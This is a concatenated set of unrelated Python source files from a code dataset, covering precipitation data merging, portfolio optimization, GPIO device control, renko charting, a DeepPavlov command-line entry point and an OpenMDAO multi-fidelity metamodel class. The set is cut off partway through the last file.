print(trie.search('app')) # True | StarcoderdataPython |
158001 | from sunrisePy import sunrisePy
import time
import numpy as np
ip='172.31.1.148'
# ip='localhost'
iiwa=sunrisePy(ip)
iiwa.setBlueOn()
time.sleep(2)
iiwa.setBlueOff()
try:
while True:
print(iiwa.getJointsMeasuredTorques())
time.sleep(0.2)
except KeyboardInterrupt:
iiwa.close()
print('an error happened')
raise
| StarcoderdataPython |
1776496 | <filename>demo/scripts/shot.py
#!/usr/bin/env python
"""
Recreate tcl script in python
'scripts/shot.tcl'
==============
set verify
set tree demo
set current demo 0
set current demo /increment
create pulse 0
set tree demo /shot=0
dispatch /build /monitor=MONITOR
dispatch /phase init /monitor=MONITOR
"""
import MDSplus as mds
# set verify
| StarcoderdataPython |
1610090 | <gh_stars>0
#!/usr/bin/env python
# coding: utf-8
# In[1]:
from netCDF4 import Dataset, num2date
import numpy as np
import xarray as xr
import matplotlib.pyplot as plt
import cartopy.crs as crs
from wrf import getvar, get_cartopy, latlon_coords, to_np, cartopy_xlim, cartopy_ylim
import pprint
import pandas as pd
import os
from datetime import datetime
import seaborn as sns
import dataframe_image as dfi
from geopy.distance import geodesic
from scipy.spatial.distance import cdist, pdist
# #### Función que genera un dataframe a partir de la lectura de un archivo de la NASA
# In[2]:
def get_nasa_dataframe(dataset,idx):
lats = dataset.variables["lat"][:]
lons = dataset.variables["lon"][:]
time = dataset.variables["time"]
times = num2date(time[:], time.units)
time_of_data = times[0].strftime("%Y-%m-%d")
prcpCal = f1.variables["precipitationCal"]
prcpCal_cnt = f1.variables["precipitationCal_cnt"]
prcpCal_cnt_cond = f1.variables["precipitationCal_cnt_cond"]
HQprcp = f1.variables["HQprecipitation"]
HQprcp_cnt = f1.variables["HQprecipitation_cnt"]
HQprcp_cnt_cond = f1.variables["HQprecipitation_cnt_cond"]
ds = xr.Dataset(
{
"date": time_of_data,
"prcpCal": (("lon", "lat"), prcpCal[0,:,:]),
"prcpCal_cnt": (("lon", "lat"), prcpCal_cnt[0,:,:]),
"prcpCal_cnt_cond": (("lon", "lat"), prcpCal_cnt_cond[0,:,:]),
"HQprcp": (("lon", "lat"), HQprcp[0,:,:]),
"HQprcp_cnt": (("lon", "lat"), HQprcp_cnt_cond[0,:,:]),
"HQprcp_cnt_cond": (("lon", "lat"), HQprcp_cnt_cond[0,:,:]),
},
{
"lon": lons,
"lat": lats,
},
)
df = ds.to_dataframe()
dataframe = df.reset_index()[:]
return(dataframe.iloc[idx])
# #### Función que regresa un dataframe solo con la información de precipitación, ciudad y fecha
# In[3]:
def get_prometeus_dataframe(filename, df, city):
date = filename[:8]
date = datetime.strptime(date, "%Y%m%d").strftime("%Y-%m-%d")
df["datetime"] = pd.to_datetime(df["datetime"])
df["datetime"] = df["datetime"].dt.strftime("%Y-%m-%d")
dfp_city = df[(df["dominio"] == "d01") & (df["ciudad"] == city)]
dfp_city_date = dfp_city[dfp_city.datetime == date]
total = dfp_city_date["precipitacion"].sum()
# print(total)
data = {
"date": [date],
"city": [city],
"precipitation": [total]
}
df_data = pd.DataFrame(data)
return(df_data)
# #### En este paso abrimos todos los archivos de la NASA que previamente descargamos, ademas mandamos extraer solo la información de ciertas ciudades. Todos los archivos tiene el prefix NASA GES_DISC GPM_L3 v06 IMERG_Final
# In[4]:
path = "nasa/"
df_nasa = pd.DataFrame()
dfn_hmo = pd.DataFrame()
dfn_nog = pd.DataFrame()
dfn_obr = pd.DataFrame()
for ncfile in os.listdir(path):
if ncfile.endswith(".nc4"):
f1 = Dataset(path + ncfile)
dfn_hmo = dfn_hmo.append(get_nasa_dataframe(f1, 7950), ignore_index=True)
dfn_nog = dfn_nog.append(get_nasa_dataframe(f1, 5656), ignore_index=True)
dfn_obr = dfn_obr.append(get_nasa_dataframe(f1, 10336), ignore_index=True)
f1.close()
dfn_hmo = dfn_hmo.sort_values(by="date").reset_index(drop=True)
dfn_nog = dfn_nog.sort_values(by="date").reset_index(drop=True)
dfn_obr = dfn_obr.sort_values(by="date").reset_index(drop=True)
# #### Revisamos que todo se haya generado bien
# In[5]:
#Hermosillo
dfn_hmo.head()
# In[6]:
#Heroica Nogales
dfn_nog.head()
# In[7]:
#Ciudad Obregon
dfn_obr.head()
# #### En este paso abrimos todos los archivos de PROMETEUS que previamente descargamos, ademas mandamos extraer solo la información de ciertas ciudades. Todos los archivos tiene el prefix fecha+_dataset.csv
# In[8]:
path = "prometeus/"
dfp_nog = pd.DataFrame()
dfp_hmo = pd.DataFrame()
dfp_obr = pd.DataFrame()
for file in os.listdir(path):
if file.endswith(".csv"):
f1 = pd.read_csv(path + file)
dfp_nog = dfp_nog.append(get_prometeus_dataframe(file, f1, "Heroica Nogales"), ignore_index=True)
dfp_hmo = dfp_hmo.append(get_prometeus_dataframe(file, f1, "Hermosillo"), ignore_index=True)
dfp_obr = dfp_obr.append(get_prometeus_dataframe(file, f1, "Ciudad Obregón"), ignore_index=True)
dfp_nog = dfp_nog.sort_values(by=["date"]).reset_index(drop=True)
dfp_hmo = dfp_hmo.sort_values(by=["date"]).reset_index(drop=True)
dfp_obr = dfp_obr.sort_values(by=["date"]).reset_index(drop=True)
# #### Revisamos que todo se haya generado bien
# In[9]:
#Heroica Nogales
dfp_nog.head()
# In[10]:
#Hermosillo
dfp_hmo.head()
# In[11]:
#Ciudad Obregón
dfp_obr.head()
# #### Unimos los dataframes de NASA y PROMETEUS para cada ciudad
# In[12]:
adata_hmo = dfn_hmo.merge(dfp_hmo, on=["date"], how="left")
adata_nog = dfn_nog.merge(dfp_nog, on=["date"], how="left")
adata_obr = dfn_obr.merge(dfp_obr, on=["date"], how="left")
# #### Revisamos que se hayan generado bien
# In[13]:
#Hermosillo
adata_hmo.head()
# In[14]:
#Heroica Nogales
adata_nog.head()
# In[15]:
#Ciudad Obregon
adata_obr.head()
# #### Unimos los 3 dataframes
# In[27]:
adata_merged = pd.merge(adata_hmo, adata_nog, on="date", suffixes=("_hmo","_nog"))
adata = pd.merge(adata_merged, adata_obr, on="date")
# #### Revisamos que esten todos los datos
# In[28]:
adata.info()
# #### Por último generamos el archvo tidy_data.csv y el diccionario de datos para trabajar con ellos mas adelante
# In[29]:
#Renombramos las columnas para que tengan el mismo formato
adata.rename(columns = {"city": "city_obr",
'HQprcp': 'HQprcp_obr',
"precipitation": "prcp_obr",
"precipitation_hmo": "prcp_hmo",
"precipitation_nog": "prcp_nog"},
inplace = True)
#Seleccionamos las que nos interesan
sel_adata = adata[["date","city_hmo","city_nog","city_obr",
"HQprcp_hmo","HQprcp_nog","HQprcp_obr",
"prcp_hmo","prcp_nog","prcp_obr"]]
#Guardamos en formato csv
sel_adata.to_csv("datos_tidy.csv", index=False)
# In[35]:
#Diccionario de Datos
columna = [
"date",
"city_hmo",
"city_nog",
"city_obr",
"HQprcp_hmo",
"HQprcp_nog",
"HQprcp_obr",
"prcp_hmo",
"prcp_nog",
"prcp_obr",
]
descripcion = [
"Fecha de pronóstico YYYY-mm-dd",
"Ciudad de Hermosillo",
"Ciudad de Nogales",
"Ciudad de Obregón",
"Pronóstico de precipitación acumulada 24hrs de la NASA para Hermosillo",
"Pronóstico de precipitación acumulada 24hrs de la NASA para Nogales",
"Pronóstico de precipitación acumulada 24hrs de la NASA para Ciudad Obregón",
"Pronóstico de precipitación acumulada 24hrs de PROMETEUS para Hermosillo",
"Pronóstico de precipitación acumulada 24hrs de PROMETEUS para Nogales",
"Pronóstico de precipitación acumulada 24hrs de PROMETEUS para Ciudad Obregón",
]
data = pd.DataFrame({"Columna": columna, "Descripción": descripcion})
data.to_csv("diccionario_datos.csv", index=False)
# In[ ]:
| StarcoderdataPython |
1684997 | #!/usr/bin/env python
from collections import defaultdict
import itertools
def manhattan(a, b=itertools.repeat(0)):
return sum([abs(a-b) for a, b in zip(a, b)])
def solve(input):
wire1, wire2 = input
wire1 = wire1.split(',')
wire2 = wire2.split(',')
grid = defaultdict(lambda: '.')
pos = (0, 0)
for step in wire1:
if step[0] == 'L':
char = '-'
direction = (-1, 0)
elif step[0] == 'R':
direction = (1, 0)
char = '-'
elif step[0] == 'U':
direction = (0, 1)
char = '|'
elif step[0] == 'D':
direction = (0, -1)
char = '|'
for i in range(int(step[1:])-1):
pos = (pos[0] + direction[0], pos[1]+direction[1])
# print(pos)
grid[pos] = char
pos = (pos[0] + direction[0], pos[1]+direction[1])
grid[pos] = '+'
# print(grid)
pos = (0, 0)
for step in wire2:
if step[0] == 'L':
char = '-'
direction = (-1, 0)
elif step[0] == 'R':
direction = (1, 0)
char = '-'
elif step[0] == 'U':
direction = (0, 1)
char = '|'
elif step[0] == 'D':
direction = (0, -1)
char = '|'
for i in range(int(step[1:])-1):
pos = (pos[0] + direction[0], pos[1]+direction[1])
# print(pos)
if grid[pos] != '.':
char = 'X'
grid[pos] = char
pos = (pos[0] + direction[0], pos[1]+direction[1])
grid[pos] = '+'
print(sorted([manhattan((0, 0), pos)
for (pos, x) in grid.items() if x == 'X'])[0])
# with open('test.txt', 'r') as f:
# input = f.read().splitlines()
# solve(input)
with open('input.txt', 'r') as f:
input = f.read().splitlines()
solve(input)
| StarcoderdataPython |
3316215 | # import necessary libraries
import pandas_datareader as web
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
from datetime import date
import optimal_portfolio as opt_func
import return_portfolios as ret_port_func
import scipy.stats as stats
import seaborn as sns
import cvxopt as opt
from cvxopt import blas, solvers
# choose plot style
plt.style.use('seaborn')
sns.set_palette("pastel")
# ignore certain mathematical errors (in case)
#np.seterr(divide='ignore', invalid='ignore')
# get user input(6 tickers and monthly expected return) and print
ticker1 = input("Input your first selected ticker symbol")
ticker2 = input("Input your second selected ticker symbol")
ticker3 = input("Input your third selected ticker symbol")
ticker4 = input("Input your fourth selected ticker symbol")
ticker5 = input("Input your fifth selected ticker symbol")
ticker6 = input("Input your sixth selected ticker symbol")
er_input_monthly = input("What is your monthly expected rate of return? (%)")
user_er_daily = ((float(er_input_monthly)/100) * 12) / 252
print('')
print("Desired Monthly Return: " + str(er_input_monthly) + "%")
print('')
print("Desired Daily Return: " + str(user_er_daily) + "%")
# putting user-entered tickers in a list and printing
symbols = [ticker1, ticker2, ticker3,ticker4,ticker5,ticker6]
print('')
print(symbols)
# creating numpy array out of symbols list in case of future need
symbols_array = np.array(symbols)
#backup list of selected symbols
#symbols = ['MSFT', 'AMZN', 'AAPL', 'GOOG', 'FB', 'AMD']
#Creating dates
start_date ='2016-01-01'
end_date = date.today()
# backup end date
#end_date ='2021-05-01'
#Retreiving data from yahoo finance API through pandas data-reader
stock_data = (web.get_data_yahoo(symbols, start_date, end_date)).dropna()
stock_data = pd.DataFrame(stock_data)
#Viewing data
#print(stock_data)
# slicing data pulled from yahoo to select only the adj close of each ticker
selected = list((stock_data.columns[0:len(symbols)]))
# calculating the daily returns, dropping rows with empty values
returns_daily = stock_data[selected].pct_change().dropna()
# calculating the expected return by calculating the mean
expected_returns = returns_daily.mean()
# calculating the covariance matrix of the portfolio to determine correlation between tickers
cov_daily = returns_daily.cov()
# printing covariance matrix
print(expected_returns)
print('')
print("Covariance Matrix: ")
print('')
print(cov_daily)
print('')
returnsdf = pd.DataFrame(returns_daily)
returnsdf.columns = symbols
returnsdf = returnsdf.reset_index()
#returnsdf.to_csv('daily_returns.csv')
# Gathering index and risk-free rate data for portfolio comparison and Sharpe measure computation
index_data = (web.get_data_yahoo('^GSPC', start_date, end_date)).dropna()
index_data = pd.DataFrame(index_data)
index_daily_returns = index_data['Adj Close'].pct_change().dropna()
index_expected_returns = index_daily_returns.mean()
rf_data = (web.get_data_yahoo('^TNX', start_date, end_date)).dropna()
rf_data = pd.DataFrame(rf_data)
rf_daily = rf_data['Adj Close'].pct_change().dropna()
rf = rf_daily.mean()
#print(index_expected_returns)
##########################
# calculating the standard deviation of each ticker in the portfolio
single_asset_std = np.sqrt(np.diagonal(cov_daily))
print('')
# calculating the normality of the returns of the entire portfolio
print(stats.jarque_bera(returns_daily))
print('')
# calling function to create random portfolios with corresponding risk and return relationships
df_port = ret_port_func.return_portfolios(expected_returns, cov_daily)
# calling function to produce the efficient frontier, returning weights, returns, risks,
# and the set of portfolios
weights, returns, risks, portfolios = opt_func.optimal_portfolio(returns_daily[1:])
returns_monthly = [(i*252)/12 for i in returns]
# converting portfolios set into a pandas dataframe, adding ticker symbols as column headers for readability
portfoliosdf = pd.DataFrame(portfolios)
portfoliosdf.columns = symbols
portfoliosdf = portfoliosdf.reset_index()
# appending Expected Return and Risk columns to the optimal portfolios dataframe
portfoliosdf['Expected Return'] = returns
portfoliosdf['Risk'] = risks
# calculating the MVP
mvp = portfoliosdf.iloc[99] # minimum variance portfolio(least risky)
# calculating the MRP
mrp = portfoliosdf.iloc[0] # maximum risk portfolio(most risky)
# locating the corner portfolios with the closest expected return to the user desired expected return
chosen_portfolios = portfoliosdf.iloc[(portfoliosdf['Expected Return']-user_er_daily).abs().argsort()[:2]]
chosen_portfolios = chosen_portfolios.reset_index()
# creating a new dataset to compare the chosen corner portfolios with a market index
index_chosen_port = chosen_portfolios.copy(deep=True)
index_chosen_port.loc[len(index_chosen_port.index)] = ['101', 'index', 0, 0,0,0,0,0, index_expected_returns, 1/252]
index_chosen_port['Names'] = ['Optimal Portfolio 1', 'Optimal Portfolio 2', 'S&P 500 Index']
index_chosen_port['Expected Returns Monthly'] = (index_chosen_port['Expected Return']*252)/12
index_chosen_port['Sharpe Ratio'] = ((index_chosen_port['Expected Return'] - rf) / (index_chosen_port['Risk']))*252/12
index_chosen_port.to_csv('index_chosen_port.csv')
print(chosen_portfolios)
print(index_chosen_port.head())
### work in progress ###
"""
ticker1_weight = [chosen_portfolios.iloc[0][ticker1]]
ticker2_weight = [chosen_portfolios.iloc[0][ticker2]]
ticker3_weight = [chosen_portfolios.iloc[0][ticker3]]
ticker4_weight = [chosen_portfolios.iloc[0][ticker4]]
ticker5_weight = [chosen_portfolios.iloc[0][ticker5]]
ticker6_weight = [chosen_portfolios.iloc[0][ticker6]]
#print(ticker1_weight)
chosen_returns = pd.DataFrame()
chosen_returns['Date'] = returnsdf['Date']
chosen_returns['optimal1'] = returnsdf[ticker1] * ticker1_weight
chosen_returns['optimal2'] = returnsdf[ticker2] * ticker2_weight
chosen_returns['optimal3'] = returnsdf[ticker3] * ticker3_weight
chosen_returns['optimal4'] = returnsdf[ticker4] * ticker4_weight
chosen_returns['optimal5'] = returnsdf[ticker5] * ticker5_weight
chosen_returns['optimal6'] = returnsdf[ticker6] * ticker6_weight
chosen_returns['daily_return'] = chosen_returns['optimal1'] + chosen_returns['optimal2'] + chosen_returns['optimal3'] + chosen_returns['optimal4'] + chosen_returns['optimal5'] + chosen_returns['optimal6']
#chosen_returns.to_csv('chosen_returns.csv')
"""
################
# printing optimal portfolios dataframe to a CSV file for reference
portfoliosdf.to_csv('markowitz_portfolios.csv')
#print(portfoliosdf)
# plotting efficient frontier with highlighted chosen portfolios closest to user's desired return
df_port.plot.scatter(x='Volatility', y='Returns', fontsize=12, color = 'steelblue', alpha=0.5)
plt.plot(risks, returns, color = 'mediumseagreen', marker = 'o', alpha = 0.80)
plt.plot(chosen_portfolios['Risk'], chosen_portfolios['Expected Return'], color = 'tomato', marker = '*',markersize=14)
plt.ylabel('Expected Returns(Daily)',fontsize=14)
plt.xlabel('Volatility (Std. Deviation)',fontsize=14)
plt.title('Efficient Frontier', fontsize=24)
plt.show()
#### WORK IN PROGRESS #### visualize optimal portfolios vs index
plt.figure(figsize=(8,4))
sns.barplot(data=index_chosen_port, x='Names', y='Expected Returns Monthly', palette=['limegreen', 'turquoise', 'mediumpurple'], alpha=0.85)
plt.title('Optimal Portfolios Returns compared to Market Index')
plt.ylabel('Expected Returns(Monthly)',fontsize=12)
plt.xlabel('')
plt.show()
### visualizing an individual ticker's returns with the returns of the entire efficient frontier
plt.figure(figsize=(12,8))
plt.subplot(211)
sns.barplot(data=returnsdf, x='Date', y=ticker1)
plt.title('Daily returns ' + str(ticker1), fontsize = 20)
plt.xticks([])
plt.ylabel('Returns',fontsize=14)
plt.xlabel('Time',fontsize=14)
plt.subplot(212)
sns.barplot(data=portfoliosdf, x='index', y="Expected Return")
plt.xticks([])
plt.xlabel('')
plt.title('Markowitz Portfolios Expected Returns', fontsize=20)
plt.show()
#####
# plotting the distribution of returns of each ticker in the portfolio
plt.figure(figsize= (14,8))
plt.subplot(231)
sns.distplot(returnsdf[ticker1], color='g')
plt.title('Distribution of returns: ' + str(ticker1), fontsize = 14)
plt.subplot(232)
sns.distplot(returnsdf[ticker2], color='b')
plt.title('Distribution of returns: ' + str(ticker2), fontsize = 14)
plt.subplot(233)
sns.distplot(returnsdf[ticker3], color='purple')
plt.title('Distribution of returns: ' + str(ticker3), fontsize = 14)
plt.subplot(234)
sns.distplot(returnsdf[ticker4], color='orange')
plt.title('Distribution of returns: ' + str(ticker4), fontsize = 14)
plt.subplot(235)
sns.distplot(returnsdf[ticker5], color='red')
plt.title('Distribution of returns: ' + str(ticker5), fontsize = 14)
plt.subplot(236)
sns.distplot(returnsdf[ticker6], color='yellow')
plt.title('Distribution of returns: ' + str(ticker6), fontsize = 14)
plt.subplots_adjust(hspace=0.5)
plt.show()
#plt.figure(figsize=(14, 8))
#sns.barplot(data=chosen_returns, x="Date", y="daily_return", color = 'b')
#sns.barplot(data=returnsdf, x="Date", y=ticker1, alpha=0.6, color = 'r')
#plt.title('Daily Returns of Optimal Chosen Portfolio vs ' + str(ticker1), fontsize = 14)
#plt.legend()
#plt.show()
| StarcoderdataPython |
1742777 | <reponame>cdgriffith/darkroom
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import time
from threading import Thread
from gpiozero import OutputDevice
class Enlarger(OutputDevice):
def __init__(self, pin):
super(Enlarger, self).__init__(pin, initial_value=True)
self.printing = False
self.print_thread = None
self.timer_thread = None
self.draw = None
self.state = False
self.length = 0
self.off()
def toggle(self):
if self.printing:
return False
if self.state:
self.off()
else:
self.on()
def on(self):
self.state = True
self._write(False)
def off(self):
self.state = False
self._write(True)
def execute(self, length, draw):
if self.printing:
return False
self.printing = True
self.draw = draw
self.length = length
self.timer_thread = Thread(target=self._timer)
self.print_thread = Thread(target=self._print_off)
self.print_thread.setDaemon(True)
self.timer_thread.setDaemon(True)
self.print_thread.start()
self.timer_thread.start()
def _timer(self):
initial = self.length
while self.length > 0:
self.draw(self.length)
if not self.printing:
self.draw(initial)
return
time.sleep(0.2)
self.draw(initial)
def _print_off(self):
self.on()
end_time = time.time() + self.length
while self.length > 0:
if not self.printing:
return
time.sleep(0.05)
self.length -= 0.05
if time.time() >= end_time:
break
self.printing = False
self.off()
self.length = 0
def cancel(self):
self.off()
self.printing = False
self.print_thread = None
self.timer_thread = False
self.length = 0
| StarcoderdataPython |
1751573 | # -*- coding: utf-8 -*-
#
"""WLSQM (Weighted Least SQuares Meshless): a fast and accurate meshless least-squares interpolator for Python, for scalar-valued data defined as point values on 1D, 2D and 3D point clouds.
A general overview can be found in the README.
For the API, refer to wlsqm.fitter.simple and wlsqm.fitter.expert.
When imported, this module imports all symbols from the following modules to the local namespace:
wlsqm.fitter.defs # definitions (constants) (common)
wlsqm.fitter.simple # simple API
wlsqm.fitter.interp # interpolation of fitted model (for simple API)
wlsqm.fitter.expert # advanced API
This makes the names available as wlsqm.fit_2D(), wlsqm.ExpertSolver, etc.
JJ 2017-02-22
"""
# absolute_import: https://www.python.org/dev/peps/pep-0328/
from __future__ import division, print_function, absolute_import
__version__ = '0.1.6'
from .fitter.defs import * # definitions (constants) (common)
from .fitter.simple import * # simple API
from .fitter.interp import * # interpolation of fitted model (for simple API)
from .fitter.expert import * # advanced API
| StarcoderdataPython |
21885 | import atrlib
import pandas as pd
# module for calculation of data for renko graph
def renko(df):
d , l , h ,lbo ,lbc,vol=[],[],[],[],[],[]
brick_size = atrlib.brick_size(df)
volume = 0.0
for i in range(0,len(df)):
if i==0:
if(df['close'][i]>df['open'][i]):
d.append(df['date'][i])
l.append(df['open'][i])
h.append(df["close"][i])
lbo.append(df["open"][i])
lbc.append(df["close"][i])
vol.append(df['volume'][i])
else:
d.append(df['date'][i])
l.append(df['close'][i])
h.append(df["open"][i])
lbo.append(df["open"][i])
lbc.append(df["close"][i])
vol.append(df['volume'][i])
else:
volume += df["volume"][i]
leng = len(lbo)
if(lbc[leng-1]>lbo[leng-1]):
if(df["close"][i]>=(lbc[leng-1]+brick_size)):
lbc.append((lbc[leng-1]+brick_size))
lbo.append(lbc[leng-1])
l.append(lbc[leng-1])
h.append((lbc[leng-1]+brick_size))
d.append(df["date"][i])
vol.append(volume)
volume = 0.0
elif(df["close"][i]<=(lbo[leng-1]-brick_size)):
lbc.append((lbo[leng-1]-brick_size))
lbo.append(lbo[leng-1])
h.append(lbo[leng-1])
l.append((lbo[leng-1]-brick_size))
d.append(df["date"][i])
vol.append(volume)
volume = 0.0
else:
if(df["close"][i]>=(lbo[leng-1]+brick_size)):
lbc.append((lbo[leng-1]+brick_size))
lbo.append(lbo[leng-1])
l.append(lbo[leng-1])
h.append((lbo[leng-1]+brick_size))
d.append(df["date"][i])
vol.append(volume)
volume = 0.0
elif(df["close"][i]<=(lbc[leng-1]-brick_size)):
lbc.append((lbc[leng-1]-brick_size))
lbo.append(lbc[leng-1])
h.append(lbc[leng-1])
l.append((lbc[leng-1]-brick_size))
d.append(df["date"][i])
vol.append(volume)
volume = 0.0
data_ = pd.DataFrame(d,columns=["date"])
data_["open"] = lbo
data_["close"] =lbc
data_["low"] = l
data_["high"] = h
data_['volume']=vol
return data_
| StarcoderdataPython |
1748584 | <reponame>khakhulin/DeepPavlov<filename>deeppavlov/deep.py<gh_stars>0
"""
Copyright 2017 Neural Networks and Deep Learning lab, MIPT
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import argparse
from pathlib import Path
import sys
import os
p = (Path(__file__) / ".." / "..").resolve()
sys.path.append(str(p))
from deeppavlov.core.commands.train import train_evaluate_model_from_config
from deeppavlov.core.commands.infer import interact_model, predict_on_stream
from deeppavlov.core.common.log import get_logger
from deeppavlov.download import deep_download
from utils.telegram_utils.telegram_ui import interact_model_by_telegram
from utils.server_utils.server import start_model_server
log = get_logger(__name__)
parser = argparse.ArgumentParser()
parser.add_argument("mode", help="select a mode, train or interact", type=str,
choices={'train', 'evaluate', 'interact', 'predict', 'interactbot', 'riseapi', 'download'})
parser.add_argument("config_path", help="path to a pipeline json config", type=str)
parser.add_argument("-t", "--token", help="telegram bot token", type=str)
parser.add_argument("-b", "--batch-size", dest="batch_size", default=1, help="inference batch size", type=int)
parser.add_argument("-f", "--input-file", dest="file_path", default=None, help="Path to the input file", type=str)
parser.add_argument("-d", "--download", action="store_true", help="download model components")
def find_config(pipeline_config_path: str):
if not Path(pipeline_config_path).is_file():
configs = [c for c in Path(__file__).parent.glob(f'configs/**/{pipeline_config_path}.json')
if str(c.with_suffix('')).endswith(pipeline_config_path)] # a simple way to not allow * and ?
if configs:
log.info(f"Interpreting '{pipeline_config_path}' as '{configs[0]}'")
pipeline_config_path = str(configs[0])
return pipeline_config_path
def main():
args = parser.parse_args()
pipeline_config_path = find_config(args.config_path)
if args.download or args.mode == 'download':
deep_download(['-c', pipeline_config_path])
token = args.token or os.getenv('TELEGRAM_TOKEN')
if args.mode == 'train':
train_evaluate_model_from_config(pipeline_config_path)
elif args.mode == 'evaluate':
train_evaluate_model_from_config(pipeline_config_path, to_train=False, to_validate=False)
elif args.mode == 'interact':
interact_model(pipeline_config_path)
elif args.mode == 'interactbot':
if not token:
log.error('Token required: initiate -t param or TELEGRAM_BOT env var with Telegram bot token')
else:
interact_model_by_telegram(pipeline_config_path, token)
elif args.mode == 'riseapi':
start_model_server(pipeline_config_path)
elif args.mode == 'predict':
predict_on_stream(pipeline_config_path, args.batch_size, args.file_path)
if __name__ == "__main__":
main()
| StarcoderdataPython |
3277402 | ## PRINTING A SINGLE CUSTOM CHARACTER
'''
Take a look at this code, which prints a single smiley face character to the display:
'''
from RPLCD import CharLCD, cleared, cursor # This is the library which we will be using for LCD Display
from RPi import GPIO # This is the library which we will be using for using the GPIO pins of Raspberry PI
# Initializing the LCD Display
lcd = CharLCD(numbering_mode=GPIO.BOARD, cols=16, rows=2, pin_rs=37, pin_e=35, pins_data=[33, 31, 29, 23])
smiley = (
0b00000,
0b01010,
0b01010,
0b00000,
0b10001,
0b10001,
0b01110,
0b00000,
)
lcd.create_char(0, smiley)
lcd.write_string(unichr(0))
# Always Clean Up the GPIO after using the code
GPIO.cleanup()
| StarcoderdataPython |
3283503 | <filename>openmdao/components/multifi_meta_model.py
"""Define the MultiFiMetaModel class."""
import numpy as np
from openmdao.components.meta_model import MetaModel
def _get_name_fi(name, fi_index):
"""
Generate variable name taking into account fidelity level.
Parameters
----------
name : str
base name
fi_index : int
fidelity level
Returns
-------
str
variable name
"""
if fi_index > 0:
return "%s_fi%d" % (name, fi_index + 1)
else:
return name
class MultiFiMetaModel(MetaModel):
"""
Generalize MetaModel to be able to train surrogates with multi-fidelity training inputs.
For a given number of levels of fidelity **nfi** (given at initialization)
the corresponding training input variables *train:[invar]_fi[2..nfi]* and
*train:[outvar]_fi[2..nfi]* are automatically created
besides the given *train:[invar]* and *train:[outvar]* variables.
Note the index starts at 2, the index 1 is omitted considering
the simple name *var* is equivalent to *var_fi1* which is intended
to be the data of highest fidelity.
The surrogate models are trained with a list of (m samples, n dim)
ndarrays built from the various training input data. By convention,
the fidelities are intended to be ordered from highest to lowest fidelity.
Obviously for a given level of fidelity corresponding lists
*train:[var]_fi[n]* have to be of the same size.
Thus given the initialization::
>>> mm = MultiFiMetaModel(nfi=2)`
>>> mm.add_input('x1', 0.)
>>> mm.add_input('x2', 0.)
>>> mm.add_ouput('y1', 0.)
>>> mm.add_ouput('y2', 0.)
the following supplementary training input variables
``train:x1_fi2`` and ``train:x2_fi2`` are created together with the classic
ones ``train:x1`` and ``train:x2`` and the output variables ``train:y1_fi2``
and ``train:y2_fi2`` are created as well.
The embedded surrogate for y1 will be trained with a couple (X, Y).
Where X is the list [X_fi1, X_fi2] where X_fi1 is an (m1, 2) ndarray
filled with the m1 samples [x1 value, x2 value], X_fi2 is an (m2, 2) ndarray
filled with the m2 samples [x1_fi2 value, x2_fi2 value]
Where Y is a list [Y1_fi1, Y1_fi2] where Y1_fi1 is a (m1, 1) ndarray of
y1 values and Y1_fi2 a (m2, 1) ndarray y1_fi2 values.
.. note:: when *nfi* ==1 a :class:`MultiFiMetaModel` object behaves as
a :class:`MetaModel` object.
"""
def __init__(self, nfi=1):
"""
Initialize all attributes.
Parameters
----------
nfi : number of levels of fidelity
"""
super(MultiFiMetaModel, self).__init__()
self._nfi = nfi
# generalize MetaModel training inputs to a list of training inputs
self._training_input = nfi * [np.zeros(0)]
self._input_sizes = nfi * [0]
def add_input(self, name, val=1.0, **kwargs):
"""
Add an input variable to the component.
Parameters
----------
name : str
name of the variable in this component's namespace.
val : float or list or tuple or ndarray or Iterable
The initial value of the variable being added in user-defined units.
Default is 1.0.
shape : int or tuple or list or None
Shape of this variable, only required if src_indices not provided and
val is not an array. Default is None.
src_indices : int or list of ints or tuple of ints or int ndarray or Iterable or None
The global indices of the source variable to transfer data from.
If val is given as an array_like object, the shapes of val and
src_indices must match. A value of None implies this input depends
on all entries of source. Default is None.
units : str or None
Units in which this input variable will be provided to the component
during execution. Default is None, which means it is unitless.
desc : str
description of the variable
var_set : hashable object
For advanced users only. ID or color for this variable, relevant for
reconfigurability. Default is 0.
"""
metadata = super(MultiFiMetaModel, self).add_input(name, val, **kwargs)
input_size = metadata['value'].size
self._input_sizes[0] = self._input_size
# Add train:<invar>_fi<n>
for fi in range(self._nfi):
if fi > 0:
name_with_fi = 'train:' + _get_name_fi(name, fi)
self.metadata.declare(name_with_fi, desc='Training data for %s' % name_with_fi)
self._input_sizes[fi] += input_size
def add_output(self, name, val=1.0, **kwargs):
"""
Add an output variable to the component.
Parameters
----------
name : str
name of the variable in this component's namespace.
val : float or list or tuple or ndarray
The initial value of the variable being added in user-defined units. Default is 1.0.
shape : int or tuple or list or None
Shape of this variable, only required if val is not an array.
Default is None.
units : str or None
Units in which the output variables will be provided to the component during execution.
Default is None, which means it has no units.
res_units : str or None
Units in which the residuals of this output will be given to the user when requested.
Default is None, which means it has no units.
desc : str
description of the variable.
lower : float or list or tuple or ndarray or Iterable or None
lower bound(s) in user-defined units. It can be (1) a float, (2) an array_like
consistent with the shape arg (if given), or (3) an array_like matching the shape of
val, if val is array_like. A value of None means this output has no lower bound.
Default is None.
upper : float or list or tuple or ndarray or or Iterable None
upper bound(s) in user-defined units. It can be (1) a float, (2) an array_like
consistent with the shape arg (if given), or (3) an array_like matching the shape of
val, if val is array_like. A value of None means this output has no upper bound.
Default is None.
ref : float
Scaling parameter. The value in the user-defined units of this output variable when
the scaled value is 1. Default is 1.
ref0 : float
Scaling parameter. The value in the user-defined units of this output variable when
the scaled value is 0. Default is 0.
res_ref : float
Scaling parameter. The value in the user-defined res_units of this output's residual
when the scaled value is 1. Default is 1.
var_set : hashable object
For advanced users only. ID or color for this variable, relevant for reconfigurability.
Default is 0.
"""
super(MultiFiMetaModel, self).add_output(name, val, **kwargs)
self._training_output[name] = self._nfi * [np.zeros(0)]
# Add train:<outvar>_fi<n>
for fi in range(self._nfi):
if fi > 0:
name_with_fi = 'train:' + _get_name_fi(name, fi)
